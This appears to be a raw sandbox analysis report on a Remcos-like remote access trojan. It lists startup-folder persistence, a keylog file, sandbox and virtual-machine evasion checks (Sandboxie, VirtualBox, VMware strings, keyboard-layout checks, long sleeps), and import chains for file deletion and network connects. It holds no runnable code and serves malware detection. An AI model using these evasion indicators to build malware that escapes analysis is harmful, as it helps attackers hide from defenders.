                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00401102 in eax, dx 11_2_00401102
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 31458
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 30860
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | Binary or memory string: TSBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004106B8
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 519
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 910
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 7754
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: foregroundWindowGot 1760
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Evaded block: after key decision graph_11-5127
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | API coverage: 2.1 %
                    Source: C:\Users\user\Desktop\file.exe TID: 1476 | Thread sleep time: -5190000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 6416 | Thread sleep time: -455000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 6416 | Thread sleep time: -3877000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 004044E8h 11_2_004044C3
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 004044E8h 11_2_004044C3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,5_2_004051E3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_004041A6
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00404E73
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408AE5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00409832
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_tr
aits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator
@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$a
llocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
